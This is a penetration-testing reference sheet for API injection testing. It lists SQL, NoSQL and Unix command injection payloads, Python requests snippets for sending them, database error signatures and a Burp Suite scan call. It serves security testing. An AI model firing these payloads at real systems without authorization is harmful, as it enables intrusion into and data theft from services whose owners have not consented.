Anthropic-Cybersecurity-Skills/skills/exploiting-api-injection-vulnerabilities/references/api-reference.md

API Reference: API Injection Vulnerability Testing

OWASP API Security Top 10

#	Risk	Description
API1	Broken Object Level Auth	Accessing other users' data
API2	Broken Authentication	Weak auth mechanisms
API3	Broken Object Property Level Auth	Mass assignment
API8	Security Misconfiguration	Injection via misconfig
API10	Unsafe Consumption	Server-side injection

SQL Injection Payloads

Error-Based

' OR '1'='1
' UNION SELECT NULL,NULL--
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--

Time-Based Blind

' AND SLEEP(5)--
' AND pg_sleep(5)--
'; WAITFOR DELAY '0:0:5'--

NoSQL Injection Payloads

MongoDB Operator Injection

{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}}
{"username": {"$regex": "admin.*"}}

Where Clause Injection

{"$where": "this.password == 'test'"}

Command Injection Payloads

Unix

; id
| whoami
$(id)
`id`

Blind Command Injection

; sleep 5
| ping -c 5 127.0.0.1
$(sleep 5)

Python requests Library

GET with Parameters

import requests
resp = requests.get(url, params={"id": payload}, timeout=10, verify=False)

POST with JSON Body

resp = requests.post(url, json={"field": payload}, timeout=10)

Response Analysis

Attribute	Usage
resp.status_code	HTTP status
resp.text	Response body
resp.elapsed.total_seconds()	Response time
len(resp.content)	Response size

Error Signatures

SQL Databases

Database	Error Pattern
MySQL	You have an error in your SQL syntax
PostgreSQL	ERROR: syntax error at or near
MSSQL	Unclosed quotation mark
Oracle	ORA-01756
SQLite	SQLITE_ERROR

Burp Suite API

Initiate Scan

POST https://burp:1337/v0.1/scan
Content-Type: application/json

{
  "urls": ["https://api.target.com/v1/users"],
  "scan_configurations": [{"name": "Audit checks - SQL injection"}]
}